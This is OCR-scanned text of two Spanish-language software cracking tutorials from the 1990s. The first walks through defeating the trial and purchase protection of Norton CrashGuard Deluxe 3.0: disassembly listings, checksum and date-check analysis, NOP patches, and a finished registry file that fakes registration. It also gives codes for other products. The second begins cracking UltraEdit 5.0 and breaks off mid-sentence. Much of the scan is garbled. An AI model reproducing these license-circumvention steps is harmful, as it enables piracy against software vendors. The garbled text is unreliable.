aparecen unos bonitos botones en los que nos podemos registrar por Internet, probar el producto o cancelar. Si probamos el producto, aparece la 
ventana principal con todas pas opciones. Si elegimos la opción de registro, aparece una pantalla donde introducimos nuestros datos y nuestra tarjeta 
de crédito. 


PRIMERA SORPRESA 


El sistema de pago no es de la propia Symantec, sino de la empresa Release Software Corporation:http://www.releasesoft.com) y su programa 
SalesA gen. Es la primera vez y veo que Symantec no controle todos los aspectos de una aplicación. 


SEGUNDA SORPRESA 


El fichero a estudiar es el Norton CrashGuardicgmain.exe (229.376 bytes) por una simple razón, tiene el único fichero que tiene el icono que el del 
programa principal que aparece en la barra de tareas. Pero, en el mismo directorio aparece un extraño fichero llamado cgmain.dl_ (743.936 bytes). 
Mu raro, una librería aparentemente comprimida (y por tanto no utilizada) con un tamaño más grande que el ejecutable. Por que no está 
descomprimida la librería, ¿quizás por que no estamos registrados? :-) Además aparece un ejecutable llamado cgmaipop.exe , cuyo nombre es mu 
parecido al fichero del programa que estamos analizando cgmain.exe y tiene un icono que tiene las letras RS, que curioso, justo las Iniciales del la 
empresa que dedica a comercializar el producto: Release Software. Si intentamos ejecutar cgmaipop.exe aparece que está preparando el Software. 
PREPARANDO?, ¿es que hay que precalentar los programas antes de instalarlos?. Luego aparece un mensaje de error indicando que no podemos 
ejecutar la aplicación, ¿quizás por que no estamos registrados? :-) 


Por si fuera poco, aparece otro fichero cgmaitky.dll (257.977) con un nombre muy parecido al de la aplicación que queremos estudiar y 
aproximadamente con el mismo tamaño. Y el colmo, en el otro directorio, donde reside el menú de la aplicación Norton CrashGuard 
DeluxelCGDeluxe.exe aparecen los ficheros CGDelpop.exe con el logo RS y CGDeltky.dll. Análogamente para Norton CrashGuard 
Deluxeicheckup.exe (el programa de testeo de la fecha del sistema) CheckUp.dl_,Checktky.dll 


Todo esto huele a chamusquina, seguro que estos ficheros tienen algo que ver a la hora de registrar el programa, y como veremos en la segunda pate 
del artículo, tienen que ver y MUCHO. 


LA APROXIMACIÓN DIFÍCIL 
AL ATAQUEEEEEEEEEEEEEE 


Podríamos analizar esos extraños ficheros que han aparecido, y lo haremos en la segunda parte del artículo. Ahora atacaremos formalmente a 
Norton CrashGuardiegmain.exe para analizar su esquema CINDERELLA de 30 días. 


Desensamblamos el programa con el w32dsam y obtenmos 3.5 MB de fichero. En las funciones importadas encontramos Addr:00045CC8 hint(00F5) 
Name: GetLocalTime . Bien, bien, asi que, aparentemente, está usando la tipica rutina para obtener la fecha del sistema. Si vemos quien la utiliza, 


estaremos en plena rutina de comprobación de fecha: fechaA ctual>fecha de caducidad? 


Solamente aparece la función getlocaltime que es utilizada una vez en el programa(¿por qué lo ponen tan fácil?) 


* Referenced by a CALL at Addresses: 
| :0040D5B4 , :0040DA44 , :0040DD3F'; La rutina es llamada 3 veces 


:0041E200 81ECCC000000 sub esp, 000000CC 
:0041E206 8D442410 lea eax, dword ptr [esp+10] 
:0041E20A 50 push eax 


* Reference To: KERNEL32.GetLocalTime, Ord: 00F5h 


1 

[1:0041E20B FF15BC544400 Call dword ptr [004454BC] 
:0041E211 8D4C2400 lea ecx, dword ptr [espl 
:0041E215 51 push ecx 


|[* Reference To: KERNEL32.GetSystemTime, Ord:0135h 


:0041E216 FF15B8544400 Call dword ptr [004454B8] 


Además aparece la llamada tambien a GetSystemTime. 


Tras la llamada a GetSystemTime los valores de año, mes, día.,.... son extraídos de la pila y guardados en los registros :0041E21 mov dx, word ptr 
[esp+0A] De los registros pasan a unas variables globales :0041E2AA mov dword ptr [0042F7F0], edx 


Recordad, cualquier posición de memoria fija como [0042F7F0], es utilizada como variable global por el programa. Despues se reintroducen en la 
pila el año, el mes, el día.,.... y se llama a la rutina :0041E310 call 00423420. 


En esta rutina es donde se realiza la encriptación de la fecha,al finalizar, devuelve en eax la fecha encriptada y además de guardarse en :0041E323 
mov dword ptr [ecx], eax 


Es más, las tres llamadas a :0041E200 obtendrán en eax la fecha encriptada de vuelta por call 00423420. Nos os voy a aburrir con diciendo como es la 
rutina de encriptación. Simplemente decir que utiliza la siguiente fórmula : 


t=seconds+(secondsMinute*minutes)+(secondsHour*hour)+(secondsDay*day)+ 
(secondsDay*daysMonth[month])+(secondsY ear*(year-1900))+(secondsDay*(((year-1900)-1)/4)); fin=(t+fix Value); 


Siempre es más fácil comparar un número que comparar años, días, meses,... por eso la fecha se transforma en un número. He construido un 
pequeño programa NORTON.EXE en C que realiza todo el proceso de encriptación de la fecha. Este programa esta incluido con la version en 
formato *.doc de este texto. Los fuentes de estos programas puedes bajarlos aqui. 


Bien, lo lógico, es que una vez encriptada la fecha se compruebe con la fecha de caducidad que debe estar encriptada. Si analizamos las tres llamadas 
a :0041E200 tenemos: 


* La llamada desde :0040D5B4, se limita a guardar la fecha encriptada :0040D641 mov dword ptr [esi+000002AC], eax 


1* La llamada desde :0040DA44, :0040DD3F hacen prácticamente lo mismo, mueven la fecha encriptada que estaba en eax a un registro, hacen una 
llamada a call 40DC40 y despues comprueban la fecha encriptada con [edi+00000284] 


En concreto para la llamada desde :0040DD3F 


:0040DD4B mov ebx, eax 

:0040DD62 push ebx 

:0040DD63 call 0040DC40 

:0040DD7B cmp dword ptr [edi+00000284], ebx 
:0040DDBF ja 0040DDE4 


En concreto para la llamada desde :0040DA44 


:0040DA 54 mov edi, eax 

:0040DASF push edi 

:0040DA60 call 0040DC40 

:0040DAB2 cmp dword ptr [ebx+00000284], edi 
:0040DABS ja 0040DACE 


Esto suena a una doble comprobación temporal, serán desconfiados estos chicos. 


¿Pero que hace la llamada a call 0040DC407, para ello cerramos el cgmain.exe: botón derecho sobre el icono de la N y el escudo y exit. Abrimos el 
loader del Softice y seleccionamos Norton CrashGuardicgmain.exe y ponemos un bpx 40DC40 y lanzamos el programa. Aparecemos en el Softice, 
pulsamos F10 y vemos que ha sido llamada desde :40DD63. Cerramos el cgmain.exe otra vez, ponemos el softice un bpx 40DD63 y lanzamos el 
programa y prestamos atención a ebx que es el que contiene la fecha encriptada. 


La llamada a call 0040DC40 simplemente realiza la siguiente comprobación 


:0040DC56 cmp edx, eax; compara fechaAnterior,fechaActual 
:0040DC58 ja 0040DC64; Salta si eres un mal chico. 


fecha Anterior es la fecha encriptada el la que se arrancó por última vez el programa, fechaActual es la fecha encriptada obtenida de :0041E200. Es 
una simple comprobación para ver si hemos echado para atrás el reloj. 


La comprobación 


cmp dword ptr [ebx+00000284], edi; Análogamente cmp dword ptr [edi+00000284], ebx 
ja 0040DACE; Análogamente ja 0040DDE4 Comprueba fechaCaducidad > fechaActual Si es mayor estamos en el período de prueba. 


LA FECHA DE CADUCIDAD 


La pregunta es, ¿de donde se guarda la fecha de caducidad encriptada? .Poniendo un bpr ebx+00000284 ebx+00000284+5 descubrimos que la fecha 
de encriptación se guarda en el registro del sistema y es recuperada por la llamada a la función :40BD89 RegqueryValueEXA. En concreto, se 


guarda en HKEY_CLASSES_ROOTWUItxfilllFormadAMSHAEZDO( write 


En mi caso, el valor de write es: 


01 02 03 04 05 06 07 08 


01 00 00 00 05 B7 FF FF F8 
02 00 00 00 00 00 00 10 00 
03 08 00 00 00 08 00 00 00 
04 00 00 00 06 B3 36 71 Al 
05 FB Or 81 A5 20 80 00 06 


06 B7 9F A9 AO 00 00 00 00 
07 00 00 00 06 B3 36 71 AO 
08 C3 28 00 00 18 00 00 00 
09 00 00 00 00 00 


La fecha de caducidad está en write(5,7) hasta write(6,5) ambos inclusive. Lo curioso, es que la fecha está codificada, por ejemplo si la fecha de 
caducidad es 0034F5F3D6 se guarda en write 0006B79FA9A000. La rutina de encriptación está en :40C0D6 y se basa en la operación or 


:0040C0D6 8A18 mov bl, byte ptr [eax] 
:0040C0D8 8A11 mov dl, byte ptr [ecx] 
:0040C0DA CO0OE305 sh1l b1, 05 

:0040C0DD 48 dec eax 

:0040C0DE COEAO3 shr dl, 03 

:0040C0E1 49 dec ecx 

:0040C0E2 OADA or bl, dl 

:0040C0E4 4E dec esi 

:0040C0E5 885101 mov byte ptr [ecx+01], dl 
:0040C0E8 885901 mov byte ptr [ecx+01], bl 


He creado dos programas DECODE que decodifica el valor de write y CODE que codifica un valor de fecha para introducirlo en write. 


CHECKSUMS PARAINOCOS 


Los puntos de ataque son claros 


1.- Parchear las comprobaciones en el ejecutable. 
2.- Introducir una fecha caducidad en el año 30000. 


1.- Si parcheamos el programa, se produce un error tan gordo que se casca windows. Esto se puede deber a que hemos crackeado mal obien exite un 
checksum. Para salir de dudas, basta con modificar alguna cadena de caracteres del ejecutable original Por ejemplo ''not be run in DOS mode" lo 
pasamos a ''not be RUN in DOS mode", si se casca es que hay un checksum, como en este caso. 


Un checksum es una comprobación para ver si el ejecutable se ha modificado, normalmente se realiza sumando (XOR) los bytes del ejecutable y 
guardando este valor algún sitio (ejecutable, registro del sistema). El programa al arrancar suma (XOR) los bytes del ejecutable actual y comprueba 
la suma con el valor que tenía guardado. Si hay algún problema es que un virus o un cracker ha modificado el programa y esto nunca es bueno para 
el programador. 


En el caso del Norton CrashGuard Deluxe 3.0, el checksum se realiza de otra forma. Os acordais del fichero cgmaitky.dll, si hombre ese que nos 
parecía tan sospechoso. Pos bien, guarda todos los bytes del cgmain.exe encriptados (de ahí que tuvieran un tamaño tan parecido ambos ficheros). La 
rutina de checksum,simplemente consiste en coger de 16 en 16 los bytes del cgmain.exe encriptarlos y ver si son iguales a 16 bytes del fichero 
cgmaitky.dll. Si existe alguna diferencia se produce un error de protección general y se casca todo. 


Para complicarlo todo, las rutinas de comprobación (ver si los 16 bytes del ejecutable son iguales a los 16 bytes del cgmaitky.dll) no están metidas en 
un bucle, sino que estan a lo extenso. Es decir, hay una rutina de comprobación para los 16 primeros bytes, otra disinta para los 16 siguientes. Si 
queremos parchear el checksum, habrá que modificar unas 30 comprobaciones. Es curioso, pero existe un flag que desactiva la llamada al checksum 
:0040862D jne 00408695 si obligamos a saltar siempre, evitamos el checksum. PERO, ¿POR QUE EXISTE UN FLAG PARA EVITAR EL 
CHECKSUM?, ¿es que el programa cgmain.exe va a modificarse? Como veremos más tarde, así ocurrirá. 


2.- Con el programa NORTON se crea la fecha de caducidad que queremos, con el programa CODE se encripta y ya sólo hay que introducir el 
resultado en HKEY_CLASSES_ROOTUItxfilelFormaiMSHAEZDO(C write en las posiciones write(5,7),write(6,5) 
|¡CHECKSUMS HASTA EN LA SOPA 


Cuando la fecha de caducidad ha vencido, el programa deja de funcionar parcialmente, si analizamos el porqué descubrimos que el byte 
[esi+00000568] controla todo el meollo. En concreto, 


Si [esi+00000568] = 02 You cannot Run this Application 

Si [esi+00000568] = 20 Your computer application source has changed 
Si [esi+00000568] = 08 Your free trial period is over 

Si [esi+00000568] = 04 OK 


Pero, ¿¿cómo se rellena este byte?. Siguiendo la pista hacia atrás descubrimos que se carga a partir de 
HKEY_CLASSES_ROOTWUItxfillA Forma MSHAEZDOCVopen 


00 01 02 03 04 05 06 07 1 00 00 00 00 30 00 00 00 2 00 00 00 00 00 00 10 00 3 08 08 00 00 20 00 00 00 4 00 00 00 00 00 00 00 00 


En concreto de write(3,4). Hay que tener cuidado por que está encriptado, así que hay que utilizar el programa DECODE. Osea , si en write(3,4)=20 
indica que al desencriptarlo [esi+00000568]=4. Si write(3,4)=40 la fecha de caducidad ha vencido. 


Si ha pasado la fecha de caducidad y asignamos write(3,4)=20, el programa replica diciendo que hemos trampeado los recursos. ¿QUE PASA 
AQUÍ?. 


Mu facil, HAY UN CHECKSUM en la sección HKEY_CLASSES_ROOTWUItxfilelFormatMSHAEZDOCopen. Estos es paranoico, un checksum en 
el propio registro del sistema. En concreto, el checksum está en write(1,4). Se deja como ejercicio localizar y destruir este checksum. 


LA MISMA PROTECCIÓN EN TODOS SITIOS 


Aunque parezca increíble, los ficheros CGDeluxe.exe y CheckUp.exe tienen exactamente la misma protección que cgmain.exe y además en los 
mismos offset, osea en las mismas direcciones de memoria. Esto es extremadamente extraño, así que adoptaremos otra vía de ataque. 


LA APROXIMACIÓN FÁCIL 
Veamos lo que tenemos: 


- Unos ficheros extraños asociados a los ficheros importantes. Sabemos la función de uno de ellos los *tky.dll sirven de checksum, pero y el resto para 
que sirven? 


- Un flag que desactiva el checksum del ejecutable. 

- Unos misteriosos fichero ejecutables con el logo RS que dicen que tiene que prepara el Sotware. 
Nos centraremos en los ejecutables con los logos RS. 

REUNIENDO LAS PIEZAS 


Para cada utilidad , p.e. CGDeluxe.EXE existe un fichero, CGDeltky.dll, que realiza funciones de checksum (como ya vimos), una librería de un gran 
tamaño , CGDeluxe.dl_,y un ejecutable CGDelpop.exe que ''prepara el Software". 


No hay que ser un lince para darse cuenta que CGDelpop.exe "prepara" de alguna forma CGDeluxe.dl_ para aportar toda la funcionalidad a 
CGDeluxe.EXE. Esta "preparación" sólo se realiza cuando estamos registrados. 


Por tanto, se parte de un archivo ejecutable de un tamaño inferior a la versión completa del programa. Una vez realizado el proceso de compra se 
activa otro ejecutable que convierte la versión de prueba en versión completa . 


Todas las demás utilidades que acompañan al Norton CrashGuard Deluxe tienen el mismo proceso (CheckUP.exe ->Checkpop.exe, Checkup.dl_, 
Checktky.dll) (Cgmaipop.exe ->cgmain.exe, cgmaitky.dll) 


LA COMPRA VIRTUAL 


Nos centraremos en el asistente (CGDeluxe.EXE) de compra que vimos en nuestra ''Primera Aproximación" : Doble click en el escudo con la N que 
hay en el escritorio y al pulsar el botón Buy Now (comprar ahora) aparece el asistente de compra. 


Este será nuestro punto de entrada. Si pensamos un poco observaremos que la aplicación que lanza el proceso de compra debe saber si la compra ha 
tenido éxito o no. Por tanto, será por aquí por donde centremos nuestros esfuerzos . Además debe de anunciar de alguna forma al resto de utilidades 
que la compra ha tenido éxito para que ellas también se ''preparen'' Analizaremos el ejecutable CGDeluxe.exe (que el que se lanza al pulsar el icono 
del escritorio) y observaremos como ''compra”. 


Nada mejor que usar un desensamblador para investigar el programa CGDeluxe.exe (224 Kb). Una vez aparece el listado observamos que hace uso 
de la librería comercial RSAGNT32.DLL (encargada de realizar la compra virtual) y que existen un referencias a funciones tales como SAlnitialize, 
startSalesAgent. Estas van a ser nuestras funciones de aproximación. 


| 
¡Pulsamos en el botón de Imported Functions (Imp Fn) y hacemos doble click en la línea de rsagnt32.startSalesA gent. 


¡Aparecerá en el listado lo siguiente: 


¡* Reference To: rsagnt32.startSalesAgent, Ord:000Eh 


|:00407834 E807F30000 Call 00416B40 Ñf Llamada al asistente 
:00407839 83C408 add esp, 00000008 

:0040783C 66833D0425430000 cmp word ptr [00432504], 0000 
:00407844 742B je 00407871 


Echamos un vistazo hacia arriba y hacia abajo del listado y vemos que nos encontramos en un bloque de código que se encarga de cargar, iniciar, 
ejecutar, terminar el asistente de compra Buscamos donde puede empezar el bloque. Y un poco mas arriba encontramos: 


111111111111 // INICIO DE BLOQUE //////////////// 
* Referenced by a CALL at Address: 
:00406752 fdesde aquí es llamado el bloque del asistente de compra 


:004077B0O A1BO07B4300 mov eax, dword ptr [00437BB0] 
:004077B5 53 push ebx 


* Reference To: rsagnt32.startSalesAgent, Ord:000Eh Ñ£ Aquí hemos comenzado la busqueda 


:00407834 E807F30000 Call 00416B40 Ñf Llamada al asistente 
:00407839 83C408 add esp, 00000008 

:0040783C 66833D0425430000 cmp word ptr [00432504], 0000 

:00407844 742B je 00407871 

:00407846 BFE0A54300 mov edi, 0043A5E0 

:00407878 5F pop edi 

:00407879 5E pop esi 

:0040787A 5B pop ebx 

:0040787B C3 ret 


11111111111 // FIN DE BLOQUE //////////////// 


Ahora una vez que conocemos desde donde hemos llamado al bloque, usamos el menu Goto a Goto Code Location y escribimos el desplazamiento 
406752. Aquí observamos lo siguiente: 


* Possible Reference to String Resource ID=00001: "Turnkexe" 


:00406748 C705C826430001000000 mov dword ptr [004326C8], 00000001 


:00406752 E859100000 call 004077B0 f Entrada en el bloque anterior 
:00406757 66392D04254300 cmp word ptr [00432504], bp 

:0040675E 0F84F4010000 je 00406958 

|:00406764 BF34254300 mov edi, 00432534 


¡'Ummmm.... Aquí ya tenemos una bonita dirección de memoria (variable global) para usar con Softice.Pero antes añadamos la librería 
RSAGNT32.DLL. al la lista de dll que sabe manejar el Softice. 


¡Abrimos el Symbol Loader de Softice y en el menu Edita Softice Initialization SettingsaExports añadimos RSAGNT32.DLL. Abrimos el Symbol 
¡Loader y cargamos (Load) el programa CGDeluxe.exe. Ya en el SoftIce: 


Bpx 406752 


Bpx startSalesA gent 


Pulsamos F5 y cuando aparezca la ventana de "Welcome to Symantec Trialware'" pulsamos sobre el botón ''Buy Now"'. Aparecer en el Softice en el 
primer breakpoint Bpx 406752 


Seguimos ejecutando, paramos en la función startSalesA gent 


lcs:00407834 E807F30000 Call rsagnt32!startSalesAgent Ññ Asistente de compra 
cs:00407839 83C408 add esp, 00000008 

cs:0040783C 66833D0425430000 cmp word ptr [00432504], 0000 

las:00407844 742B je 00407871 Ñ si salta, has comprado 


¡Nopeamos el asistente de compra. Esto es, sustituimos la llamada por instrucciones inonfesivas. En : 00407834 90 90 90 90 90 


Si estudiamos je 00407871 y hacemos que no vaya a la dirección 407871 aparece una ventana contándonos que se ha grabado un archivo llamado 
Rslicens.txt pero esto no hace que se active el proceso de compra, este nos es el camino. 


¡Otra comparación interesante se encuentra después de la rutina de entrada al bloque 


cs:00406752 ES59100000 call 004077B0 6 Bloque anterior cs:00406757 66392D04254300 cmp [00432504], bp HBComparación Interesante cs:0040675E 
0F84F4010000 je 00406958 cs:00406764 BF34254300 mov edi, 00432534 


Cuando nos encontremos sobre la dirección cs:0040675E cambiamos el flag de cero que estará activada (Z) y la colocamos a desactivada (z). Ahora el 
programa seguirá en cs:00406764. Pulsemos F5 y veamos que ocurre. 


Ha aparecido una ventana que nos dice que esperemos mientras nuestro programa esta siendo preparado (Please wait while your software is being 
prepared). Al fin, se 'PREPARA EL SOFTWARE" 


Nota: Si el proceso anterior se repite muchas veces conviene que cerremos todos los programas que tengamos activo e incluso el mismo Norton 
Crashguard que tengamos en la barra de tareas. 


Una vez completado este proceso habremos comprado virtualmente el Norton crashguard Deluxe. 


Observaremos que han desaparecido los ficheros CGDeluxe.dl_ y CGDeltky.dll y han aparecido dos archivos de licencia RSLICENS.txt y 
LICENSE.xxxxxx (números de licencia) Este proceso realizado en tiempo real con el Softice no trae ningún problema... pero a la hora de hacer los 
parches no encontraremos problemas con los checksum .Pero.. TRANQUILOS QUE TODO TIENE SOLUCION. 


MODIFICANDO EL REGISTRO 


Usaremos una herramienta muy útil para los crackers el programa Regmonitor (si no lo tienes consíguelo) .Observamos unas variables que lee el 
programa (no registrado) al principio y tenemos: 


HKCRultxfile FormaAiMSHAEZD( write /** Esta nos suena */ 
HKCRwltxfile FormadMSHAEZDCxlate 
HKCRuwltxfile Forma MSHA EZDC open /* Esta nos suena*/ 


Bien, basta comparar los valores antes y después de "preparar" el software, para darse cuenta que la única modificación la realiza en open. Cuando 
está registrado su valor es: 


HKEY_CLASSES_ROOT VultxfileAFormaAMSHAEZDCtopen 
00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 10 00 
08 08 00 00 10 00 00 00 - 00 00 00 00 00 00 00 00 


Esta es la forma en que se comunica al resto de utilidades que la compra ya ha tenido éxito. 
Y YA ESTA, basta con introducir este valor en el registro para que quede registrado el Norton CrashGuard Deluxe 3.0 


MSHAEZDC corresponde al programa en cuestión a comprar. Usando el regmonitor vemos que clave busca el programa a desproteger y anotamos 
el código (MSHAEZDC). 


Esta táctica se ha probado con éxito con las siguientes aplicaciones protegidas por la compañía Release Software Corporation : Norton utilities, 
Norton Uninstaller, Norton Antivirus, Xing MPEG Encoder, 


Creando un archivo de registro ya tenemos hecho un crack no destructivo ya que no modifica ningún ejecutable. 


REGEDIT4 

; (c) ESTADO+PORCINO 1998 

; Modificación de registro para Norton Crash Guard Deluxe 
; Mr.Red € otras hierbas 


[HKEY_CLASSES_ROOTXultxfilelFormatiMSHAEZDC] 
"open"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,10,00,08,08,00,00,10,00,00,00,00,00,00,00,00,00,00,00 


| E A q q AAA Cortar por AQUÍ q q q q A A 


Para los demás programas que usan esta protección tenemos: 


Xing MPEG Encoder códigoá MSHVEMAV 
Norton Utilities códigoa MSHVEMO0OE 

Norton Unisntaller códigoa MSHW2EHL 
Bueno ha sido largo pero ha merecido la pena. 


MORALEJA: Si quieres poner una puerta, procura que no sea de papel. 


Es el colmo de la incompetencia. Confías la venta de tu producto a un empresa que proporciona una protección ridícula que no vende tu producto si 
no que prácticamente lo regala. Por que no invertir la millonada que Symantec habrá pagado a Release Software Corporation encontrar a unos 
buenos programadores en ensamblador que hicieran una protección decente.Además, esta compañía protege y vende productos de más empresas a 
parte de Symantec. 

Basta pasarse por su web http://www.releasesoft.com y comprobar lo orgullosos que están de sus clientes. 

Realmente, no creo que esta compañía dure mucho. 


La importancia de este artículo radica en que se ha conseguido solventar con éxito la protección de una casa de Software dedicada a proteger y 
vender. Quedan a nuestros pies cientos de programas , con una protección de papel, gracias a la incompetencia de una avariciosa compañía. Mejor 
sería que diera los programas gratis, y de dejara de hacer el ridículo. 


Mr.PinK £ WKT (WHISKEY KON TEKILA ) 


Esperamos vuestras opiniones, sugerencias y ensayos en estadoporcino O hotmail.com 


En breve analizaremos tipos de protecciones mucho más interesantes. 


Recordad bebed de la fuente, buscad a +ORC en la red. 


- 
V 
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INTRODUCCIÓN 


!Saludos Familia ! 


Empezemos este año con una de las técnicas crack más importantes "El Listado 
muerto" o "death listing''. Hasta ahora hemos visto la 'aproximación en vivo'' o "live 
approaching' con el maravilloso Softice. 


[DESCENSO A LOS INFIERNOS. 


¡Veamos de una vez por todas como se ejecuta una sentencia en el procesador, desde el 
¡inicio hasta el final. 


¡Supongamos que estamos programando en un lenguaje de Alto Nivel (C, C++, 
Pascal, Delphi, Visual Basic). Se llaman de Alto Nivel para diferenciarlos de los 
lenguajes más próximos al procesador, como el Ensamblador, a los que se llama 
lenguajes de Bajo Nivel. Cuanto más ''Alto'' programemos, más control perderemos 
¡sobre nuestro programa, y esto es un grave problema. 


¡Supongamos un programa, escrito en Alto Nivel, que pinta la frase "HOLA MUNDO" 
en pantalla. ¿ Qué pasos se siguen hasta que realmente se pinta la frase?. 


¡Nuestro programa debe de residir en un fichero, al que se denomina fichero fuente, en 
el que aparece la sentencia para pintar la frase. Este fichero no es entendible por el 
procesador, sólo es un conjunto de caracteres, mu diferente del conjunto de 0 y 1 que 
necesita para trabajar. Es aquí donde entra el compilador, transforma el fichero fuente 
'en un fichero intermedio, también llamado fichero objeto. En esta transformación se 
¡comprueba la sintaxis de las sentencias ( falta el punto y coma) y la semántica (has 
¡pasado un entero cuando se esperaba un real). El compilador realiza entonces una fase 
de linkado para reunir los distintos ficheros objeto que conforman nuestro programa 
final (aunque tengamos un único fichero fuente). En esta fase se determinan el mapeo 
final del program en memoria (que dirección de memoria va a tener cada instrucción 
del conjunto de ficheros objeto). Tras la fase de linkado, el programa final se encuentra 
'en un lenguaje llamado pseudocódigo, mu sencillote. Aquí se pueden tomar 3 vías. 


Primera: Dejar el programa como está, y que otros pogramas o librerías (como la 
'vbrun500.dll de Visual Basic) lo traduzcan (lo interpreten) a sentencias entendibles por 
el porcesador. 


Segunda: Transformar el pseudocódigo a un lenguaje de Bajo Nivel como el 
ensamblador. En tal caso, se necesitará un compilador de ensamblador para que el 
¡programa pueda ser ejecutado. OJO, el ensamblador no es entendible por el tonto 
¡procesador que sólo ve unos y ceros, son dos cosas distintas. 


¡Tecera: La más común, transformar directamente de pseudocódigo a ejecutable 


¡Un fichero ejecutable consta de unos y ceros (o de números en hexa, según se mire) 
¡ordenados de una forma especial; ordenados en instrucciones: Los 3 primeros números 
son el tipo de instrucción, los 4 siguientes el operandol, el siguiente el operador...Cada 
¡instrucción es depiezada dentro del procesador y dan a lugar a la ejecución de un 


conjunto de programas presenten dentro del procesador, son las microrutinas. Estas 
microrutinas son las encargadas de bloquear buses, activar multiplexores, dar tensión a 
un transistor o no, pa enterndernos. Accionando correctamente buses, multiplexires... 
¡se pintará relamete la frase en pantalla. 


Bien, esto es todo. 
Mu bien y esto pa que coño me sirve. 


¡Existe una correspondencia directa entre lenguaje ensablador y programa ejecutable. 
Gracias a un desensamblador (W32DASM, IDA PRO), a partir de un ejecutable 
podemos obtener el programa el lenguaje ensablador sin disponer del fichero fuente. 
Un program en ensamblador puede ser fácilmente entendido por los humanos (o eso 
dicen algunos). Esto nos da un poder tremendo a los crackers. Podemos saber como 
funciona un programa sin necesitar del programa original. Y lo que es má aún, 
independientemente del lenguaje de Alto Nivel. Todos los lenguajestienen que pasar a 
ejecutable de alguna u otra forma, y es aquí cuando usamos nuestro desensamblador y 
extraer su listado en ensablador. Da igual que programa esté hecho en Pascal, O C++, 
lo entederemos igualmente ya que leeremos ensamblador. 


EL LISTADO MUERTO 


¡La idea es sencilla. Cojemos nuestro desensamblador favorito y se lo pasamos al 
objetivo. Obtendremos un listado en ensamblador de nuestro programa a crackear. La 
técnica crack se llama Listado muerto porque entenderemos y manejaremos el 
¡programa con este listado, sin tener que ejecutarlo, con el programa muerto. A 
diferencia de cuando lanzamos el Softlce y entendemos el programa cuando se está 
ejecuntandose, cuando "vive". 


¡Hay tre ventajas fundaentales para utilizar el Listado Muerto. 


- Podemos seguir el programa fácilmemte de atrás hacia adelante, basta con pasar de 
página, no hace falta volver a ejecutatlo. 


- Es mucho más relajado imprimir y estudiar 4 páginas de código que rastrear con el 
¡SoftIce. Este es uno de los consejos de +ORC. 


- Se descubren pequeños secretos, como rutinas inactivas. 


La paciencia y la tranquilidad son dos requisitos fundamentales en un cracker. Es fácil 
perderte trazando con el SoftIce e imposible con el Listado Muerto. 


Manos a la Obra 


Una vez desensamblado el objetivo, la idea es buscar cadenas de texto interesantes, 
como "unregistered", expired”, "congratulations'' y mirar al rededor de estas 
cadenas buscando un salto mágico. Las palabras en concreto dependen del programa y 
¡son las que aparecen para recordarte que aún no te has registrado. 


CÓMO CRACKEAR UEDIT 5.0 


Objetivo: Uedit 5.0. 

Versión: 5.0 3/7/97 

Nombre del ejecutable: uedit32.exe 

Website: http://www.uedit.com 

Tamaño del ejecutable: 812.514 bytes. 

Tipo de protección: Por número de serie y temporal. 
Dificultad: Medio. 

Tiempo de crackeo: 5 minutos. 

Herramientas: W32dasms.X, Softlce. 


Siguiendo la recomendación del maestro +ORC, continuamos con el crack a nuestras 
herramientas de trabajo. En este caso nos encontramos ante un excelente editor 


hexadecimal, vital para nuestros negocios :-) 


Instalemos el programa, ejecutémoslo y veamos lo que nos encontramos. ARRJJ!!, una 


horrible ventana nos dice que tenemos 45 diás para registranos. Además tiene un bonito 
botón ''Enter Authorization Code". Pulsemos y veamos. Un típico nombre de usario y 
¡número de serie (al que le llamaré passwod o pass). Si pulsamos cuaquier guarrada en 
¡ambos, sorpresa, ningúm mensaje advirtiendo del error, ningún pitido (recordais el 


capítulo ID), nada excepto una ventana de mensaje que dice que hace falta cerrar el 


¡programa para validar el código. ¿Habrá leido lan D. Mead las lecciones de 
'Estado+Porcino?. Bien, ¿por donde atacar?. No tenemos nada que nos indique que nos 


hemos equivocado. ¿Que tal si usamos el Listado Muerto amiguitos? 


Una vez desensablado el programa y dentro del W32dasm pulsemos el botón de Strn Ref 


(el boton que está al lado del botón de impresora) para ver las cadenas de caracteres que 
aparecen en el nuetro objetivo. Que vemos, que casualidad , tenemos la frase ''Thank 
you fot supporting Shareware" , hagamos doble click y veamos donde aparecemos: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: |:00401B77(C) | 

:00401B7D 83FB09 cmp ebx, 00000009 

1:00401B80 7504 jne 00401B86 

1:00401B82 C645EC20 mov [ebp-14], 20 * Referenced by a (U)nconditional or (C)onditional Jump at 
:00401B86 8D45C8 lea eax, dword ptr [ebp-38] 

|* Possible Reference to String Resource ID=00010: '' Thank you for supporting Shareware." 


:00401B89 6A0A push 0000000A 


¡En :00401B89 tenemos una referencia a la cadena que nos interesa. Cada frase del 
¡programa tiene asociado un número, en este caso es el 0000000A y este número se les 
¡pasa al las rutinas que tienen que imprimir los mensajes. La forma tradicional de 
¡pasarle parámetros a una rutina es a través la pila mediante push (como en :00401B89 ). 
¡Los parámetros se pasan empezando por el último, es lo que se llama paso de 
¡parámetros mediate el modelo de PASCAL, existen otros modelos, pero son poco 
jutilizados. 


¡¿Estamos en el camino adecuado¿, nop, ya que el número de nuestra frase, el 0000000A 
¡(en es número 10 en decimal) es muy utilizado en cualquier programa y cada vez que 
laparezca, el desensamblador pensará que se está haciendo referencia a nuestra frase. 
¡Bien pensemos un poco. 


¡Nuestro programa está limitado por 45 días de uso, pasado ese tiempo, lo normal es que 
[nos aparezca una frase deciendo algo así como ''Evaluation time expired". Busquemos 
¡(Con el botón de la linterna ) la palabra expired pasada a una rutina mediante push a 
[ver que encontramos. 


:043F7D3 E8375DFCFF call 0040550F 

:0043F7D8 391DDC0C4A00 cmp dword ptr [004A0CDC], ebx 
:0043F7DE 758A jne 0043F76A 

:0043F7E0 8D4D10 lea ecx, dword ptr [ebp+10] 


1:0043F7E3 E829C00100 call 0045B811 


:0043F7E8 8D4D14 lea ecx, dword ptr [ebp+14] 
:0043F7EB C645FC01 mov [ebp-04], 01 
:0043F7EF E81DC00100 call 0045B811 


* Possible Reference to String Resource ID=00068: "UltraEdit 45 Day 
[Evaluation time expired!!!!" | 


:0043F7F4 6A44 push 00000044 
BINGO. No sentís el código, no percibis como estamos en el camino correcto. 


¡Si, tenemos en :0043F7F4 un push con el número asociado a la frase que buscamos y 
¡justo en :0043F7DE un salto a 0043F76A que evita imprimir el mesaje, pero el punto 
clave es ver la comprobación del salto en :0043F7D$8. Se comprueba si el contenido de 
